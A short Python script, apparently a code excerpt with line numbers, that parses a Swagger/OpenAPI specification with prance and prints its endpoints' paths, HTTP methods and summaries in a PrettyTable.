5 | #### 6 | 7 | 8 | import sys 9 | from prance import ResolvingParser 10 | from prettytable import PrettyTable 11 | 12 | # Read in the file or URL 13 | SWAGFILE = sys.argv[1] 14 | 15 | # Set all json keys 16 | PATHS = 'paths' 17 | SUMMARY = 'summary' 18 | 19 | 20 | # Parse the swagger file and assign the dicitonary var 21 | PARSER = ResolvingParser(SWAGFILE) 22 | SWAGDICT = PARSER.specification 23 | 24 | # Init the table 25 | TABLE = PrettyTable(["Path", "Method", "Summary"]) 26 | 27 | # Print The table 28 | for PATH in SWAGDICT[PATHS].keys(): 29 | # print(SWAGDICT['basePath'] + key) 30 | for HTTPMETHOD in SWAGDICT[PATHS][PATH].keys(): 31 | summary = SWAGDICT[PATHS][PATH][HTTPMETHOD][SUMMARY] 32 | TABLE.add_row([(SWAGDICT['basePath'] + PATH), HTTPMETHOD, summary]) 33 | print TABLE 34 | 35 | --------------------------------------------------------------------------------